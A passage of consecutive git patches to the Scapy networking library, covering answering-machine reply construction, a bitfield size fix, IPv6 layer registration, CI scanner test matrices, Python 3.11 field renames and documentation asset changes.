AnsweringMachine, AnsweringMachineUtils +from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Net from scapy.config import conf from scapy.compat import orb, raw, chb, bytes_encode, plain_str @@ -29,7 +29,7 @@ from scapy.pton_ntop import inet_ntop, inet_pton from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP -from scapy.layers.inet6 import DestIP6Field, IP6Field +from scapy.layers.inet6 import IPv6, DestIP6Field, IP6Field import scapy.libs.six as six @@ -1150,7 +1150,8 @@ def is_request(self, req): ) def make_reply(self, req): - resp = AnsweringMachineUtils.reverse_packet(req) + IPcls = IPv6 if IPv6 in req else IP + resp = IPcls(dst=req[IPcls].src) / UDP(sport=req.dport, dport=req.sport) dns = req.getlayer(self.cls) if req.qd.qtype == 28: # AAAA diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 159b17aa90a..28d326b805a 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -19,7 +19,7 @@ from scapy.utils import checksum, do_graph, incremental_label, \ linehexdump, strxor, whois, colgen -from scapy.ansmachine import AnsweringMachine, AnsweringMachineUtils +from scapy.ansmachine import AnsweringMachine from scapy.base_classes import Gen, Net from scapy.data import ETH_P_IP, ETH_P_ALL, DLT_RAW, DLT_RAW_ALT, DLT_IPV4, \ IP_PROTOS, TCP_SERVICES, UDP_SERVICES @@ -2180,11 +2180,13 @@ def print_reply(self, req, reply): print("Replying %s to %s" % (reply.getlayer(IP).dst, req.dst)) def make_reply(self, req): - reply = AnsweringMachineUtils.reverse_packet(req) + reply = IP(dst=req[IP].src) / ICMP() reply[ICMP].type = 0 # echo-reply + reply[ICMP].seq = req[ICMP].seq + reply[ICMP].id = req[ICMP].id # Force re-generation of the checksum reply[ICMP].chksum = None - return reply[ICMP].underlayer + return reply conf.stats_classic_protocols += [TCP, UDP, ICMP] diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index ed96e978c1f..06398be00da 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -731,7 +731,7 @@ class Dot1AD(Dot1Q): @conf.commands.register def arpcachepoison(target, victim, interval=60): # type: (str, str, int) -> None - """Poison target's cache with (your MAC,victim's IP) couple + """Poison target's cache with (victim's IP, your MAC) couple arpcachepoison(target, victim, [interval=60]) -> None """ tmac = getmacbyip(target) diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index 7b3f50a3a7e..1715590d28c 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -12,7 +12,7 @@ import struct from scapy.arch import get_if_addr from scapy.base_classes import Net -from scapy.ansmachine import AnsweringMachine, AnsweringMachineUtils +from scapy.ansmachine import AnsweringMachine from scapy.config import conf from scapy.packet import Packet, bind_bottom_up, bind_layers, bind_top_down @@ -384,7 +384,7 @@ def is_request(self, req): def make_reply(self, req): # type: (Packet) -> Packet - resp = AnsweringMachineUtils.reverse_packet(req) + resp = IP(dst=req[IP].src) / UDP(sport=req.dport, dport=req.sport) address = self.ip or get_if_addr( self.optsniff.get("iface", conf.iface)) resp /= NBNSHeader() / NBNSQueryResponse( diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 197ca4b2d38..22a0b4a4b81 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -50,6 +50,16 @@ test_am(ARP_am, IP_addr="10.28.7.1", ARP_addr="00:01:02:03:04:05") += ICMPEcho_am +def check_ICMP_am_reply(packet): + packet.show() + assert IP in packet and ICMP in packet + assert packet[IP].dst == "1.1.1.1" + assert packet[ICMP].seq == 12 + +test_am(ICMPEcho_am, + Ether()/IP(src="1.1.1.1", dst="2.2.2.2")/ICMP(seq=12), + check_ICMP_am_reply) = DNS_am def check_DNS_am_reply(packet): From e507356bcfe502b961d6ca703cbc6941bbaa5c91 Mon Sep 17 00:00:00 2001 From: Matt Abdul-Rahim Date: Sun, 25 Sep 2022 12:42:38 +0100 Subject: [PATCH 0895/1632] Pass bitfield size keyword arguments to parent class. --- scapy/fields.py | 7 +++++-- test/fields.uts | 12 ++++++------ 2 files changed, 11 insertions(+), 8 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index b41aae16897..395d09db842 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2377,7 +2377,7 @@ def addfield(self, # type: ignore class BitFieldLenField(BitField): - __slots__ = ["length_of", "count_of", "adjust"] + __slots__ = ["length_of", "count_of", "adjust", "tot_size", "end_tot_size"] def __init__(self, name, # type: str @@ -2386,9 +2386,12 @@ def __init__(self, length_of=None, # type: Optional[Union[Callable[[Optional[Packet]], int], str]] # noqa: E501 count_of=None, # type: Optional[str] adjust=lambda pkt, x: x, # type: Callable[[Optional[Packet], int], int] # noqa: E501 + tot_size=0, # type: int + end_tot_size=0, # type: int ): # type: (...) -> None - super(BitFieldLenField, self).__init__(name, default, size) + super(BitFieldLenField, self).__init__(name, default, size, + tot_size, end_tot_size) self.length_of = length_of self.count_of = count_of self.adjust = adjust diff --git a/test/fields.uts b/test/fields.uts index d7e12e33539..8d26f379c7d 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -294,25 +294,25 @@ p.len == 4 and p.str == b"ABC" and Raw in p = BitFieldLenField test ~ field class TestBFLenF(Packet): - fields_desc = [ BitFieldLenField("len", None, 4, length_of="str" , adjust=lambda pkt,x:x+1), - BitField("nothing",0xfff, 12), + fields_desc = [ BitFieldLenField("len", None, 4, length_of="str" , adjust=lambda pkt,x:x+1, tot_size=-2), + BitField("nothing",0xfff, 12, end_tot_size=-2), StrLenField("str", "default", length_from=lambda pkt:pkt.len-1, ) ] a=TestBFLenF() r = raw(a) r -assert r == b"\x8f\xffdefault" +assert r == b"\xff\x8fdefault" a.str="" r = raw(a) r -assert r == b"\x1f\xff" +assert r == b"\xff\x1f" -p = TestBFLenF(b"\x1f\xff@@") +p = TestBFLenF(b"\xff\x1f@@") p assert p.len == 1 and p.str == b"" and Raw in p and p[Raw].load == b"@@" -p = TestBFLenF(b"\x6f\xffabcdeFGH") +p = TestBFLenF(b"\xff\x6fabcdeFGH") p assert p.len == 6 and p.str == b"abcde" and Raw in p and p[Raw].load == b"FGH" From 1989211dd20193d622aaa772ce44a668b97de311 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Wed, 5 Oct 2022 11:16:54 +0200 Subject: [PATCH 0896/1632] Register ETH_P_ALL to IPv46 --- scapy/layers/inet6.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 4f3aff74191..0c05d19a9af 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -27,8 +27,15 @@ from scapy.compat import chb, orb, raw, plain_str, bytes_encode from scapy.consts import WINDOWS from scapy.config import conf -from scapy.data import DLT_IPV6, DLT_RAW, DLT_RAW_ALT, ETHER_ANY, ETH_P_IPV6, \ - MTU +from scapy.data import ( + DLT_IPV6, + DLT_RAW, + DLT_RAW_ALT, + ETHER_ANY, + ETH_P_ALL, + ETH_P_IPV6, + MTU, +) from scapy.error import log_runtime, warning from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ DestIP6Field, FieldLenField, FlagsField, IntField, IP6Field, \ @@ -4071,6 +4078,7 @@ def _load_dict(d): ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) +conf.l3types.register_num2layer(ETH_P_ALL, IPv46) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, IPv46) From 319b2149513eaf98eb2337315d33fa726f20cf20 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 6 Oct 2022 20:43:44 +0200 Subject: [PATCH 0897/1632] Add "continue-on-error" on some CI tests (#3735) * add scanner-ci machines * test appveyor * test appveyor * update * Remove scanner tests from appveyor * change matrixes * change matrixes * try to fix * try to fix * try to fix --- .appveyor.yml | 14 +++++++++++--- .github/workflows/unittests.yml | 31 +++++++++++++++++++++++++++++-- 2 files changed, 40 insertions(+), 5 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index e928127428d..c7b375a906f 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -12,19 +12,25 @@ environment: PYTHON_ARCH: "64" TOXENV: "py27-windows" WINPCAP: "false" - UT_FLAGS: "" + UT_FLAGS: "-K scanner" - PYTHON: "C:\\Python37-x64" PYTHON_VERSION: "3.7.x" PYTHON_ARCH: "64" TOXENV: "py37-windows" WINPCAP: "false" - UT_FLAGS: "" + UT_FLAGS: "-K scanner" - PYTHON: "C:\\Python37-x64" PYTHON_VERSION: "3.7.x" PYTHON_ARCH: "64" TOXENV: "py37-windows" WINPCAP: "true" - UT_FLAGS: "-K tcpdump" + UT_FLAGS: "-K tcpdump -K scanner" + - PYTHON: "C:\\Python37-x64" + PYTHON_VERSION: "3.7.x" + PYTHON_ARCH: "64" + TOXENV: "py37-windows" + WINPCAP: "false" + UT_FLAGS: "-k scanner" # There is no build phase for Scapy build: off @@ -47,6 +53,8 @@ install: for: - matrix: + allow_failures: + - UT_FLAGS: "-k scanner" only: - WINPCAP: "true" install: diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index c941a9f0094..2a97ce3238b 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -59,9 +59,10 @@ jobs: run: tox -e mypy utscapy: - name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} + name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} ${{ matrix.flags }} runs-on: ${{ matrix.os }} timeout-minutes: 20 + continue-on-error: ${{ matrix.allow-failure }} strategy: fail-fast: false matrix: @@ -69,36 +70,62 @@ jobs: python: ["2.7", "3.10"] mode: [both] installmode: [''] + flags: [''] + allow-failure: [false] include: # Linux non-root only tests - os: ubuntu-latest python: "3.7" mode: non_root + allow-failure: false - os: ubuntu-latest python: "3.8" mode: non_root + allow-failure: false - os: ubuntu-latest python: "3.9" mode: non_root + allow-failure: false # PyPy tests: root only - os: ubuntu-latest python: "pypy2.7" mode: root + allow-failure: false - os: ubuntu-latest python: "pypy3.9" mode: root + allow-failure: false # Libpcap test - os: ubuntu-latest python: "3.10" mode: root installmode: 'libpcap' + allow-failure: false # MacOS tests - os: macos-10.15 python: "2.7" mode: both + allow-failure: false - os: macos-10.15 python: "3.10" mode: both + allow-failure: false + - os: ubuntu-latest + python: "pypy2.7" + mode: root + allow-failure: true + flags: " -k scanner" + - os: ubuntu-latest + python: "pypy3.9" + mode: root + allow-failure: true + flags: " -k scanner" + # MacOS tests + - os: macos-10.15 + python: "3.10" + mode: both + allow-failure: true + flags: " -k scanner" steps: - name: Checkout Scapy uses: actions/checkout@v3 @@ -112,7 +139,7 @@ jobs: - name: Install Tox and any other packages run: ./.config/ci/install.sh ${{ matrix.installmode }} - name: Run Tox - run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} + run: UT_FLAGS="${{ matrix.flags }}" ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov uses: codecov/codecov-action@v2 with: From 45f883e02e711e26f93b0cf7f832c50736b962fa Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 6 Oct 2022 11:40:09 +0200 Subject: [PATCH 0898/1632] Py311 fixes to contrib modules --- scapy/contrib/nsh.py | 2 +- scapy/contrib/openflow3.py | 2 +- scapy/contrib/scada/iec104/iec104_information_elements.py | 2 +- test/contrib/openflow3.uts | 2 +- test/nmap.uts | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/nsh.py b/scapy/contrib/nsh.py index 029d0b88d5e..aed7a37a619 100644 --- a/scapy/contrib/nsh.py +++ b/scapy/contrib/nsh.py @@ -27,7 +27,7 @@ class NSHTLV(Packet): "NSH MD-type 2 - Variable Length Context Headers" name = "NSHTLV" fields_desc = [ - ShortField('class', 0), + ShortField('class_', 0), BitField('type', 0, 8), BitField('reserved', 0, 1), BitField('length', 0, 7), diff --git a/scapy/contrib/openflow3.py b/scapy/contrib/openflow3.py index 4d197ffdf40..3a0b9da437a 100755 --- a/scapy/contrib/openflow3.py +++ b/scapy/contrib/openflow3.py @@ -269,7 +269,7 @@ def extract_padding(self, s): def add_ofp_oxm_fields(i, org): - ofp_oxm_fields[i] = [ShortEnumField("class", "OFPXMC_OPENFLOW_BASIC", ofp_oxm_classes), # noqa: E501 + ofp_oxm_fields[i] = [ShortEnumField("class_", "OFPXMC_OPENFLOW_BASIC", ofp_oxm_classes), # noqa: E501 BitEnumField("field", i // 2, 7, ofp_oxm_names), BitField("hasmask", i % 2, 1)] ofp_oxm_fields[i].append(ByteField("len", org[2] + org[2] * (i % 2))) diff --git a/scapy/contrib/scada/iec104/iec104_information_elements.py b/scapy/contrib/scada/iec104/iec104_information_elements.py index 13444213d9c..9c1c07e94b1 100644 --- a/scapy/contrib/scada/iec104/iec104_information_elements.py +++ b/scapy/contrib/scada/iec104/iec104_information_elements.py @@ -1327,7 +1327,7 @@ class IEC104_IE_SOF: informantion_element_fields = [ BitEnumField('fa', 0, 1, FA_FLAGS), - BitEnumField('for', 0, 1, FOR_FLAGS), + BitEnumField('for_', 0, 1, FOR_FLAGS), BitEnumField('lfd', 0, 1, LFD_FLAGS), BitEnumField('status', 0, 5, STATUS_FLAGS) ] diff --git a/test/contrib/openflow3.uts b/test/contrib/openflow3.uts index b2b88e655ef..743a62ecced 100755 --- a/test/contrib/openflow3.uts +++ b/test/contrib/openflow3.uts @@ -162,7 +162,7 @@ e[OFPTFeaturesRequest].xid == 23 pkt = TCP()/OFPMPRequestTableFeatures(table_features=[OFPTableFeatures(properties=[OFPTFPTMatch(oxm_ids=[OFBUDPSrcID()])])]) assert raw(pkt) == b'\x19\xfd\x19\xfd\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\x00\x00\x00\x00\x04\x12\x00X\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x80\x00\x1e\x02' pkt = TCP(raw(pkt)) -assert pkt.table_features[0].properties[0].oxm_ids[0].fields == {'class': 32768, 'field': 15, 'hasmask': 0, 'len': 2} +assert pkt.table_features[0].properties[0].oxm_ids[0].fields == {'class_': 32768, 'field': 15, 'hasmask': 0, 'len': 2} = Test OFBTCPSrc Autocompletion diff --git a/test/nmap.uts b/test/nmap.uts index d71c86b136c..2a98e3d9487 100644 --- a/test/nmap.uts +++ b/test/nmap.uts @@ -91,7 +91,7 @@ assert conf.nmap_kdb.filename == None = Clear temp files try: - os.remove('nmap-os-fingerprints') + os.remove(filename) except: pass From f708484009ba203e4b0c287c34200f8caf376335 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Oct 2022 00:01:06 +0200 Subject: [PATCH 0899/1632] We don't need UTscapy in /usr/bin --- setup.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/setup.py b/setup.py index 6f096c420da..758864194e3 100755 --- a/setup.py +++ b/setup.py @@ -41,8 +41,7 @@ def process_ignore_tags(buffer): # Build starting scripts automatically entry_points={ 'console_scripts': [ - 'scapy = scapy.main:interact', - 'UTscapy = scapy.tools.UTscapy:main' + 'scapy = scapy.main:interact' ] }, python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4', From 2b8d5132fc077fac34df36c630d7581fcbcd4dbf Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Oct 2022 00:01:27 +0200 Subject: [PATCH 0900/1632] Remove bad animation --- .../animations/animation-scapy-demo.svg | 44 ------------------- doc/scapy/introduction.rst | 3 -- 2 files changed, 47 deletions(-) delete mode 100755 doc/scapy/graphics/animations/animation-scapy-demo.svg diff --git a/doc/scapy/graphics/animations/animation-scapy-demo.svg b/doc/scapy/graphics/animations/animation-scapy-demo.svg deleted file mode 100755 index 7e7268f74c6..00000000000 --- a/doc/scapy/graphics/animations/animation-scapy-demo.svg +++ /dev/null @@ -1,44 +0,0 @@ - - - - - - - - - - demo@scapy:~/github/scapy# demo@scapy:~/github/scapy# s demo@scapy:~/github/scapy# su demo@scapy:~/github/scapy# sud demo@scapy:~/github/scapy# sudo demo@scapy:~/github/scapy# sudo demo@scapy:~/github/scapy# sudo . demo@scapy:~/github/scapy# sudo ./ demo@scapy:~/github/scapy# sudo ./r demo@scapy:~/github/scapy# sudo ./ru demo@scapy:~/github/scapy# sudo ./run_scapy WARNING: No route found for IPv6 destination :: (no default route?) e apyyyyCY//////////YCa | >>> >>> e >>> ex >>> exp >>> expl >>> explo >>> explor >>> explore >>> explore( >>> explore() demo@scapy:~/github/scapy# sudo ./run_scapyINFO: Can't import matplotlib. Won't be able to plot.WARNING: No route found for IPv6 destination :: (no default route?)e aSPY//YASa apyyyyCY//////////YCa | sY//////YSpcs scpCY//Pp | Welcome to Scapy ayp ayyyyyyySCP//Pp syY//C | Version 2.4.2.dev228 AYAsAYYYYYYYY///Ps cY//S | pCCCCY//p cSSps y//Y | https://github.com/secdev/scapy SPPPP///a pP///AC//Y | A//A cyP////C | Have fun! p///Ac sC///a | P////YCpc A//A | We are in France, we say Skappee. scccccp///pSP///p p//Y | OK? Merci. sY/////////y caa S//P | -- Sebastien Chabal cayCyayP//Ya pY/Ya | sY/PsY////YCc aC//Yp sc sccaCY//PCypaapyCP//YSs spCPY//////YPSps ccaacs using IPython 7.2.0>>> explore() ┌────────────────────────| Scapy v2.4.2.dev228 |────────────────────────┐ │ │ Chose the type of packets you want to explore: < Layers > < Contribs > < Cancel > └───────────────────────────────────────────────────────────────────────┘ < Layers > < Contribs > < Cancel > │ │ │ │ │ ( ) IPv4 (Internet Protoco │ ( ) Bluetooth 4LE layer │ ( ) Wireless MAC according to IEEE 802.15.4. │ │ ( ) IrDA infrared data co │ ( ) LLMNR (Link Local Multicast Node Resolution). │ (*) Packet class. Binding mechanism. fuzz() method. ^ └─────────────────────────────────────────────── │ (*) Packet class. Binding mechanism. fuzz() method. ^ │ ( ) ASN.1 Packet │ │ ( ) ASN.1 Packet │ │ ( ) Bluetooth layers, sockets and send/receive functions. │ │ ( ) Bluetooth layers, sockets and send/receive functions. │ │ ( ) Classes and functions for layer 2 protocols. │ │ ( ) Classes and functions for layer 2 protocols. │ │ ( ) IPv4 (Internet Protocol v4). │ │ ( ) IPv4 (Internet Protocol v4). │ │ (*) IPv4 (Internet Protocol v4). │ < Ok > < Cancel > ┌───────────────────────────────────────────| Scapy v2.4.2.dev228 |────────────────────────────────────────────┐ Please select a layer among the following, to see all packets contained in it: │ ( ) IPv6 (Internet Protocol v6). │ │ ( ) Wireless LAN according to IEEE 802.11. │ │ ( ) Per-Packet Information (PPI) Protocol │ │ ( ) Bluetooth 4LE layer │ │ ( ) DHCP (Dynamic Host Configuration Protocol) and BOOTP │ │ ( ) DHCPv6: Dynamic Host Configuration Protocol for IPv6. [RFC 3315] │ │ ( ) DNS: Domain Name System. │ │ ( ) Extensible Authentication Protocol (EAP) │ │ ( ) GPRS (General Packet Radio Service) for mobile data communication. │ │ ( ) HSRP (Hot Standby Router Protocol): proprietary redundancy protocol for Cisco routers. # noqa: E501 │ │ ( ) IPsec layer │ │ ( ) IrDA infrared data communication. │ │ ( ) ISAKMP (Internet Security Association and Key Management Protocol). │ │ ( ) PPP (Point to Point Protocol) │ │ ( ) L2TP (Layer 2 Tunneling Protocol) for VPNs. │ │ ( ) LLMNR (Link Local Multicast Node Resolution). v └──────────────────────────────────────────────────────────────────────────────────────────────────────────────┘ │ ( ) Packet class. Binding mechanism. fuzz() method. ^ │ (*) IPv4 (Internet Protocol v4). │ < Ok > < Cancel > │ ( ) ASN.1 Packet │ ( ) DHCPv6: Dynamic Host Configuration Protocol for IPv │ ( ) GPRS (General Packet Radio Service) for mobile data communication. < Ok > < Cancel > Packets contained in scapy.layers.inet: Class |Name--------------------------|------- --------------------------|-------------------------------------------ICMP |ICMPICMPerror |ICMP in ICMPIP |IPIPOption |IP OptionIPOption_Address_Extension|IP Option Address ExtensionIPOption_EOL |IP Option End of Options ListIPOption_LSRR |IP Option Loose Source and Record RouteIPOption_MTU_Probe |IP Option MTU ProbeIPOption_MTU_Reply |IP Option MTU ReplyIPOption_NOP |IP Option No OperationIPOption_RR |IP Option Record RouteIPOption_Router_Alert |IP Option Router AlertIPOption_SDBM |IP Option Selective Directed Broadcast ModeIPOption_SSRR |IP Option Strict Source and Record RouteIPOption_Security |IP Option SecurityIPOption_Stream_Id |IP Option Stream IDIPOption_Traceroute |IP Option TracerouteIPerror |IP in ICMPTCP |TCPTCPerror |TCP in ICMPUDP >>> l >>> ls >>> ls( >>> ls(I >>> ls(IP >>> ls(IP) UDP |UDPUDPerror |UDP in ICMP>>> ls(IP) >>> p >>> pk >>> pkt >>> pkt >>> pkt = >>> pkt = >>> pkt = I >>> pkt = IP >>> pkt = IP( >>> pkt = IP(d >>> pkt = IP(ds >>> pkt = IP(dst >>> pkt = IP(dst= >>> pkt = IP(dst=" >>> pkt = IP(dst="w >>> pkt = IP(dst="ww >>> pkt = IP(dst="www >>> pkt = IP(dst="www. >>> pkt = IP(dst="www.s >>> pkt = IP(dst="www.se >>> pkt = IP(dst="www.sec >>> pkt = IP(dst="www.secd >>> pkt = IP(dst="www.secde >>> pkt = IP(dst="www.secdev >>> pkt = IP(dst="www.secdev. >>> pkt = IP(dst="www.secdev.o >>> pkt = IP(dst="www.secdev.or >>> pkt = IP(dst="www.secdev.org >>> pkt = IP(dst="www.secdev.org" >>> pkt = IP(dst="www.secdev.org") >>> pkt = IP(dst="www.secdev.org")/ >>> pkt = IP(dst="www.secdev.org")/I >>> pkt = IP(dst="www.secdev.org")/IC >>> pkt = IP(dst="www.secdev.org")/ICM >>> pkt = IP(dst="www.secdev.org")/ICMP >>> pkt = IP(dst="www.secdev.org")/ICMP( version : BitField (4 bits) = (4) ihl : BitField (4 bits) = (None)tos : XByteField = (0)len : ShortField = (None)id : ShortField = (1)flags : FlagsField (3 bits) = (<Flag 0 ()>)frag : BitField (13 bits) = (0)ttl : ByteField = (64)proto : ByteEnumField = (0)chksum : XShortField = (None)src : SourceIPField = (None)dst : DestIPField = (None)options : PacketListField = ([])>>> pkt = IP(dst="www.secdev.org")/ICMP() >>> pkt. >>> pkt.s >>> pkt.sh >>> pkt.sho >>> pkt.show >>> pkt.show2 >>> pkt.show2( >>> pkt.show2() >>> pkt = IP(dst="www.secdev.org")/ICMP() >>> pkt.show2() >>> >>> s ###[ IP ]### version= 4 ihl= 5 tos= 0x0 len= 28 id= 1 flags= frag= 0 ttl= 64 proto= icmp chksum= 0x875a src= 212.83.148.19 dst= 217.25.178.5 \options\###[ ICMP ]### type= echo-request code= 0 chksum= 0xf7ff id= 0x0 seq= 0x0>>> sr >>> sr sr() sr1flood() srbt1() srloop() srp1() srpflood() sr1() srbt() srflood() srp() srp1flood() srploop() sr() sr1flood() srbt1() srloop() srp1() srpflood() >>> sr1 >>> sr1 function(x, promisc, filter, iface, nofilter, args, kargs) sr1() srbt() srflood() srp() srp1flood() srploop() >>> sr1( >>> sr1( >>> sr1(p >>> sr1(pk >>> sr1(pkt >>> sr1(pkt) .... ..... . >>> sr1(pkt) Begin emission: .....Finished sending 1 packets. .* Received 7 packets, got 1 answers, remaining 0 packets<IP version=4 ihl=5 tos=0x0 len=28 id=21006 flags= frag=0 ttl=60 proto=icmp chksum=0x394d src=217.25.178.5 dst=212.83.148.19 |<ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 |<Padding load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>> >>> _ >>> _. >>> _.s >>> _.sh >>> _.sho >>> _.show >>> _.show( x00\x00\x00\x00\x00\x00\x00\x00\x00' |>>>>>> _.show() >>> _.show() id= 21006 ttl= 60 chksum= 0x394d src= 217.25.178.5 dst= 212.83.148.19 type= echo-reply chksum= 0xffff###[ Padding ]### load= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'demo@scapy:~/github/scapy# >>> demo@scapy:~/github/scapy# exit demo@scapy:~/github/scapy# exit - \ No newline at end of file diff --git a/doc/scapy/introduction.rst b/doc/scapy/introduction.rst index 525a50a0ed4..b960e789c9d 100644 --- a/doc/scapy/introduction.rst +++ b/doc/scapy/introduction.rst @@ -62,9 +62,6 @@ Interpreting results can help users that don't know what a port scan is but it c Quick demo ========== -.. image:: graphics/animations/animation-scapy-demo.svg - :align: center - First, we play a bit and create four IP packets at once. Let's see how it works. We first instantiate the IP class. Then, we instantiate it again and we provide a destination that is worth four IP addresses (/30 gives the netmask). Using a Python idiom, we develop this implicit packet in a set of explicit packets. Then, we quit the interpreter. As we provided a session file, the variables we were working on are saved, then reloaded:: # ./run_scapy -s mysession From 6e3d49aaabc7f61557843b81a7f08a322eed2f8d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Oct 2022 00:07:56 +0200 Subject: [PATCH 0901/1632] Make pipetool_demo.gif local --- doc/scapy/advanced_usage.rst | 2 +- .../graphics/animations/pipetool_demo.gif | Bin 0 -> 809243 bytes 2 files changed, 1 insertion(+), 1 deletion(-) create mode 100755 doc/scapy/graphics/animations/pipetool_demo.gif diff --git a/doc/scapy/advanced_usage.rst b/doc/scapy/advanced_usage.rst index f42382fba2c..8e503ede8c7 100644 --- a/doc/scapy/advanced_usage.rst +++ b/doc/scapy/advanced_usage.rst @@ -897,7 +897,7 @@ The engine is pretty straightforward: Let's run it: -.. image:: https://scapy.net/files/doc/pipetool_demo.gif +.. image:: graphics/animations/pipetool_demo.gif Class Types ----------- diff --git a/doc/scapy/graphics/animations/pipetool_demo.gif b/doc/scapy/graphics/animations/pipetool_demo.gif new file mode 100755 index 0000000000000000000000000000000000000000..ac43613eff483d0ad40dcd50028f4b55e9c10ea3 GIT binary patch literal 809243 zcma%B_cs;(|G&$1jmxz!F0QRecD8$k?5-IR*WR+JsJo1ex|NDj*~um=k!$b0_l~So zND|-o=Rf$qetVwt8t1&u^YJ{7=i~XfW@MnM=3)ox1^jLU=v=omzh+@z?O|c(WoPec zjrX&{N7{J=-|&uc_K9|P@%QnKj10Tu6F~F{BY8(X4vHW}M#Tr;OL-9UI5PSv;U3{W z`DJ9>yXd%gf#l5SOWRh)z;O1YN~6kDQ~H7?A`uC%IbKN-}o1VVGIj_=MTN)lE z-S^69Szh@4-#&FiYfn$lg5bMT4Gj}xlP^;rn_&!|j^H0t6Z(4kk^@2mgS`^(QHpa4 z`}_ONEUaV5<-#{Zrj-qJ$xs>$BB;Y3IG_YU6jI@g{#d8P$Lx#<`XZ{P(v z`2s6}F~-7&OSSv)%29ZM;3Txjhp&@x_MI*CZF+a#rY-~Imdd-%VT(=rIlw2WGJ zPj6pe-;bTMn?H3|m;Y|8p3cwB;k)6>i^t#h_7IZNfBz1yub-{0p58@E0senW_?*dH z-`eUb7N@TuD+dPtcS`t-{c3m^I?^Z18|`t|%g0mJ?REe__zwgE0h|M5{&(;HzypAt z1AfC$hUJ;fWEjUq$FB0M)_8=dafV?cqXabZS9=Ht6vYiZ3;5IPQ9uL=1A=#iqzg)G6=NNKiSV&g{;Z zlzUJ=o}?1Oz-5LeD@;1r)dSA*Q&lf zjZ8?2J3spIjq>!0{ifcZXJ2K5Ng6@LFNWF}$+So#i&$N*wI9S#hh&3xvk%D1ICcze zy%qJKEBu}Rke=kNVhUb?k1BrE{#EY=y0DL%W#NE6jZp0Z%dop)q9bxcVVmG z*<;-;2ANOE?7bBJ{Us7Yrl1@MlM%at6FN8h(Bg8zTk#=-j5o#rYqEQ8p?AOd)TNaf zO%a*$pc{rPCx1uls@mQj>)`Nr%(z<*B_RMmyPM~5waD4@%e_Yl3O(o4)s zE(eiV4qWBIOjzrkhmS5vDFrfpkw3+XzIaqADf4G=q#Sh{q-+_J{AWUfp6;CD8sjD)~pF`4aY7)-T5MCB3Hs`Xm;3cxS zoXj$mPMLuBk!I0llVh?c;NtoqdGZO5ETY(TMKw?H57S?r;Xm-9RYxF2Vhz6opOGO7 z-5c-h7*FOe4Pc;MK@GGjHf%8g>%_Q@qfI@3)Z!vqN|Ec4O|~2UEhKiue&eNTRJIv? z{~bkR)(=y>{J}B5mI5xB9Rx_ZSu4_2Vf6l@nohs-C>dr%;Ye^eXk^%#SLXznFthPY zXS0`}b3&G|e3B>&e-sqPG|cQzg$nk4)3wF)b3=a9$w%qJSt;n3$1llW-9`0F_OXqx zg6O4iLD6d*hHN#o_zOzRj3626^aO&W07FFBl$$&}4@`>{IeiHAIi6ut#PMF5&g2?0 zLICMNuO;(W%#yqGFW;5I0K3uV?n@xdnqZ~5 zae=`i`C)IMHist5lXYtX!+}r+T`SrgZzuwY6@$&qMGbbD=W}Nq#{!8?s zMo)yIPsI|ha;Wz`+#Ah2=@T=^`GBK1jlE;v-BjYJMW%E``YF$ttA*WTL!xBE2 zdKr(tnmNcDE>NT!ws?MVEMNWb11_b|x?5?y(DJa* zw*R7SZQ*!n$YGI_nJ-_5FJEQghhlH#qMO@t6PUE|65kZRo862zK3?1?4e2j({GmQs 